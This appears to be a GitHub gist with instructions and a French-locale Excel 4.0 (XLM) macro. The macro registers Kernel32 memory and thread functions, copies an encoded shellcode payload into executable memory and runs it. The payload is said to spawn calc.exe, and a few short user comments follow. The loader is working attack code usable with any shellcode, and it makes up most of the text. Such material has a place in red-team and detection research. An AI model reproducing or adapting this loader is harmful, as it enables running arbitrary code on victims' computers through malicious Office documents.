XLM (Excel 4.0 macro) to execute a shellcode into Excel (32 bits) - French Macro code
| BEWARE: THIS WILL ONLY WORK IN A FRENCH VERSION OF MS-OFFICE/EXCEL | |
| 1. Open Excel | |
| 2. Click on the active tab | |
| 3. Select "Insérer" | |
| 4. Click on "Macro MS Excel 4.0". | |
| 5. This will create a new worksheet called "Macro1" | |
| ================================================================================ | |
| In the Macro1 worksheet, paste the following block in cells in column A, starting in cell A1: | |
| ================================================================================ | |
| =REGISTRE("Kernel32";"VirtualAlloc";"JJJJJ";"VAlloc";;1;9) | |
| =REGISTRE("Kernel32";"WriteProcessMemory";"JJJCJJ";"WProcessMemory";;1;9) | |
| =REGISTRE("Kernel32";"CreateThread";"JJJJJJJ";"CThread";;1;9) | |
| =VAlloc(0;4096;4096;64) | |
| =SELECTIONNER(B1:B50;B1) | |
| =POSER.VALEUR(C1;0) | |
| =TANT.QUE(CELLULE.ACTIVE()<>"END") | |
| =POSER.VALEUR(C2;NBCAR(CELLULE.ACTIVE())) | |
| =WProcessMemory(-1; A4 + (C1 * 255); CELLULE.ACTIVE();NBCAR(CELLULE.ACTIVE()); 0) | |
| =POSER.VALEUR(C1; C1 +1) | |
| =SELECTIONNER(;"L(1)C") | |
| =SUIVANT() | |
| =CThread(0;0;A4;0;0;0) | |
| =ARRETER() | |
| ================================================================================ | |
| In the Macro1 worksheet, paste the following shellcode payload in column B, starting in cell B1 (spawns calc.exe): | |
| ================================================================================ | |
| =CAR(217)&CAR(238)&CAR(184)&CAR(239)&CAR(216)&CAR(65)&CAR(149)&CAR(217)&CAR(116)&CAR(36)&CAR(244)&CAR(95)&CAR(49)&CAR(201)&CAR(177)&CAR(49)&CAR(131)&CAR(199)&CAR(4)&CAR(49)&CAR(71)&CAR(20)&CAR(3)&CAR(71)&CAR(251)&CAR(58)&CAR(180)&CAR(105)&CAR(235)&CAR(57)&CAR(55)&CAR(146)&CAR(235)&CAR(93)&CAR(177)&CAR(119)&CAR(218)&CAR(93)&CAR(165)&CAR(252)&CAR(76)&CAR(110)&CAR(173)&CAR(81)&CAR(96)&CAR(5)&CAR(227)&CAR(65)&CAR(243)&CAR(107)&CAR(44)&CAR(101)&CAR(180)&CAR(198)&CAR(10)&CAR(72)&CAR(69)&CAR(122)&CAR(110)&CAR(203)&CAR(197)&CAR(129)&CAR(163)&CAR(43)&CAR(244)&CAR(73)&CAR(182)&CAR(42)&CAR(49)&CAR(183)&CAR(59)&CAR(126)&CAR(234)&CAR(179)&CAR(238)&CAR(111)&CAR(159)&CAR(142)&CAR(50)&CAR(27)&CAR(211)&CAR(31)&CAR(51)&CAR(248)&CAR(163)&CAR(30)&CAR(18)&CAR(175)&CAR(184)&CAR(120)&CAR(180)&CAR(81)&CAR(109)&CAR(241)&CAR(253)&CAR(73)&CAR(114)&CAR(60)&CAR(183)&CAR(226)&CAR(64)&CAR(202)&CAR(70)&CAR(35)&CAR(153)&CAR(51)&CAR(228)&CAR(10)&CAR(22)&CAR(198)&CAR(244)&CAR(75)&CAR(144)&CAR(57)&CAR(131)&CAR(165)&CAR(227)&CAR(196)&CAR(148)&CAR(113)&CAR(158)&CAR(18)&CAR(16)&CAR(98)&CAR(56)&CAR(208)&CAR(130)&CAR(78)&CAR(185)&CAR(53)&CAR(84)&CAR(4)&CAR(181)&CAR(242)&CAR(18)&CAR(66)&CAR(217)&CAR(5)&CAR(246)&CAR(248)&CAR(229)&CAR(142)&CAR(249)&CAR(46)&CAR(108)&CAR(212)&CAR(221)&CAR(234)&CAR(53)&CAR(142)&CAR(124)&CAR(170)&CAR(147)&CAR(97)&CAR(128)&CAR(172)&CAR(124)&CAR(221)&CAR(36)&CAR(166)&CAR(144)&CAR(10)&CAR(85)&CAR(229)&CAR(254)&CAR(205)&CAR(235)&CAR(147)&CAR(76)&CAR(205)&CAR(243)&CAR(155)&CAR(224)&CAR(166)&CAR(194)&CAR(16)&CAR(111)&CAR(176)&CAR(218)&CAR(242)&CAR(212)&CAR(78)&CAR(145)&CAR(95)&CAR(124)&CAR(199)&CAR(124)&CAR(10)&CAR(61)&CAR(138)&CAR(126)&CAR(224)&CAR(1)&CAR(179)&CAR(252)&CAR(1)&CAR(249)&CAR(64)&CAR(28)&CAR(96)&CAR(252)&CAR(13)&CAR(154)&CAR(152)&CAR(140)&CAR(30)&CAR(79)&CAR(159)&CAR(35)&CAR(30)&CAR(90)&CAR(252)&CAR(162)&CAR(140)&CAR(6)&CAR(45)&CAR(65)&CAR(53)&CAR(172)&CAR(49) | |
| END |
This comment has been minimized.
This comment has been minimized.
|
This comment has been minimized.
This comment has been minimized.
|
Hello @Arno0x I get an error. |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
This comment has been minimized.
Noob question. How did you generate the shellcode?